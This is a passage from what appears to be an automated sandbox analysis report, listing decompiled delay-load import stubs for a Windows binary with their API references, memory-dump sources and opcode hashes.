				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ae24, 0x127108c); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122da23
                                                                                                                                                    0x0122da2b
                                                                                                                                                    0x0122da32

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122DA2B
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: c202e2011890502279b4211e6b99b3d2e863ec7d1ccb4546e76d0ebf73ada84a
                                                                                                                                                    • Instruction ID: afdda92972aa576ffcbcd925639d8606505754932e2ea468a4aeea433441d93c
                                                                                                                                                    • Opcode Fuzzy Hash: c202e2011890502279b4211e6b99b3d2e863ec7d1ccb4546e76d0ebf73ada84a
                                                                                                                                                    • Instruction Fuzzy Hash: 8FB012A73BC526BD314862961D07E3F015CC4D0B10330C01EF801C6040D4C40C040031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122DA19, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122DA19() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ae24, 0x1271088); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122da23
                                                                                                                                                    0x0122da2b
                                                                                                                                                    0x0122da32

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122DA2B
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 0674e6decaadfb6871d3aaeecf8daf3167c485bc3a980f20f82daf360bfeb53a
                                                                                                                                                    • Instruction ID: aae6447db20ee60a3194d9d1d227b3211a6ec154da9a266db79f85fb795efa01
                                                                                                                                                    • Opcode Fuzzy Hash: 0674e6decaadfb6871d3aaeecf8daf3167c485bc3a980f20f82daf360bfeb53a
                                                                                                                                                    • Instruction Fuzzy Hash: 18B012A33BC5267D330862926C07D3F010CC4D0B10330811FF401C4040D4C40C440031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122DA7A, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122DA7A() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ae44, 0x1271178); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122da84
                                                                                                                                                    0x0122da8c
                                                                                                                                                    0x0122da93

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122DA8C
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 1c80b616b67a1699821f4d506a52328bdf44cafcd80c4563e93d0953ced82a86
                                                                                                                                                    • Instruction ID: 17bdcc2d8dca782c6f9c8ed3096af2b5e36ccf9540e77f17b52861289d522d38
                                                                                                                                                    • Opcode Fuzzy Hash: 1c80b616b67a1699821f4d506a52328bdf44cafcd80c4563e93d0953ced82a86
                                                                                                                                                    • Instruction Fuzzy Hash: 27B012A33FC1277E314861916C07C3F011CC8D0914320831EF401C4040D5D40C400031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122DA52, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122DA52() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ae24, 0x1271084); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122da23
                                                                                                                                                    0x0122da2b
                                                                                                                                                    0x0122da32

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122DA2B
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: f798408ab046db2fde12128cfc0c96c6a0dbd4c0a91660e93a48c9ea47de179e
                                                                                                                                                    • Instruction ID: f2259182c5b864c29940ee50038f7d7f6a07646d7fd82e6983be863728a80fea
                                                                                                                                                    • Opcode Fuzzy Hash: f798408ab046db2fde12128cfc0c96c6a0dbd4c0a91660e93a48c9ea47de179e
                                                                                                                                                    • Instruction Fuzzy Hash: 39B012B33BC4667D314862961D07F3F014CC4D0B10330C01EF401C5040D4C40C010031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122DAA9, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122DAA9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ae44, 0x127117c); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122da84
                                                                                                                                                    0x0122da8c
                                                                                                                                                    0x0122da93

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122DA8C
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 130bafd8a7ecf591cb2c6babf79c9a9eaef7eb1ffea6f5d542668d1804bb7b91
                                                                                                                                                    • Instruction ID: 1e3807127db19d6a99e8f3a978bb227d4c2ce0f1aa5bc504946aba5530a67991
                                                                                                                                                    • Opcode Fuzzy Hash: 130bafd8a7ecf591cb2c6babf79c9a9eaef7eb1ffea6f5d542668d1804bb7b91
                                                                                                                                                    • Instruction Fuzzy Hash: 11B012A73FC0277E304861956C07E3F011CC8D8920320C11EF801C5140D4D40C000031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122DAB3, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122DAB3() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ae44, 0x1271170); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122da84
                                                                                                                                                    0x0122da8c
                                                                                                                                                    0x0122da93

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122DA8C
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: e8796fe80b2688bf47df6d90fd17c7d00cd7d3d0e671720c5d9c7ccd8f559a22
                                                                                                                                                    • Instruction ID: 42225031c8cfac89c299fd1cbe492987cfc0c7556801cf6890a2d69ac1f7e9dd
                                                                                                                                                    • Opcode Fuzzy Hash: e8796fe80b2688bf47df6d90fd17c7d00cd7d3d0e671720c5d9c7ccd8f559a22
                                                                                                                                                    • Instruction Fuzzy Hash: 75B012A33FC1277E304861956C07D3F021CD8D4910320811FF401C5140D4D40C000031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D720, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D720() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ada4, 0x1271154); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f1
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 26f6d00cd636e6808b628dbd075f248a7f49449dc3bcb55461bad11ca6a0fcf9
                                                                                                                                                    • Instruction ID: f2cb6b92afbebe61f6701a277d7d6f666f3b2084283ed5cac3b629a6e2c1a9fc
                                                                                                                                                    • Opcode Fuzzy Hash: 26f6d00cd636e6808b628dbd075f248a7f49449dc3bcb55461bad11ca6a0fcf9
                                                                                                                                                    • Instruction Fuzzy Hash: 91B012F32B8436BE308861957D02D3F010CC8D0911330C01EF007C5540E8980C190032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D734, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D734() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ada4, 0x127114c); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f1
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 5f031a502f46d200a35101dce2084f57662d56edbc2003496baeb1facad92d84
                                                                                                                                                    • Instruction ID: 07ec368f202047051d5a50c5dd165cfd68a4b127219edfe4a662673c1d1e490a
                                                                                                                                                    • Opcode Fuzzy Hash: 5f031a502f46d200a35101dce2084f57662d56edbc2003496baeb1facad92d84
                                                                                                                                                    • Instruction Fuzzy Hash: A3B012F72B8426BE318861957C03F3F010CC8D0D11330C00EF807C5040D8880C100032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D73E, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D73E() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ada4, 0x1271148); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f1
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 37c50014adbb81bfd700a5055b7ec27dc30fef7cf73abee82c1ed90fac10d6e2
                                                                                                                                                    • Instruction ID: 9282dc2dcbc3650892226aadb2b95785ea0d47e16aaccac94a5f071054779f28
                                                                                                                                                    • Opcode Fuzzy Hash: 37c50014adbb81bfd700a5055b7ec27dc30fef7cf73abee82c1ed90fac10d6e2
                                                                                                                                                    • Instruction Fuzzy Hash: A0B012F32B8526BE31C861D57C03E3F010CC8D0D11330810EF407C5440D8880C500032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D702, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D702() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ada4, 0x1271160); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f1
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 937e608463c040e1c276d3880c02ff2d4bb794760fede7acdf38181d36a18988
                                                                                                                                                    • Instruction ID: e062ffc39b56d9eab27ecc6e9b7ad9a8ec89c26a9652eda510c98b0d8ad59fe4
                                                                                                                                                    • Opcode Fuzzy Hash: 937e608463c040e1c276d3880c02ff2d4bb794760fede7acdf38181d36a18988
                                                                                                                                                    • Instruction Fuzzy Hash: 99B012E72B852ABE308861957C02D3F020CD8D0951330800EF007C5040DC880C100132
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D70C, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D70C() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ada4, 0x127115c); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f1
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 04103539dc32f15b1e553ab3fc812a47b3748d2571192e4e0d06de134be56dab
                                                                                                                                                    • Instruction ID: 4f045cafa67be6434749b14c5f293a74ac56f2df841cb2e3b9d1e300dd1edb8d
                                                                                                                                                    • Opcode Fuzzy Hash: 04103539dc32f15b1e553ab3fc812a47b3748d2571192e4e0d06de134be56dab
                                                                                                                                                    • Instruction Fuzzy Hash: 97B012E72B8436BE308861957C02E3F010CC8D0911330C00EF407C5140D8880C140032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D716, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D716() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ada4, 0x1271158); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f1
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 3814e31e4654950c915b575b7a167c3b9c74ac4b4e853e93539af0445fa86d88
                                                                                                                                                    • Instruction ID: 9f680077c4e8172f29d51bc915d464d5f4cf6be22b9e022a40d26b90615c4474
                                                                                                                                                    • Opcode Fuzzy Hash: 3814e31e4654950c915b575b7a167c3b9c74ac4b4e853e93539af0445fa86d88
                                                                                                                                                    • Instruction Fuzzy Hash: 7CB012E32B8536BE31C861967C03D3F010CC8D0911330C10EF007C5540D8880C540032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D766, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
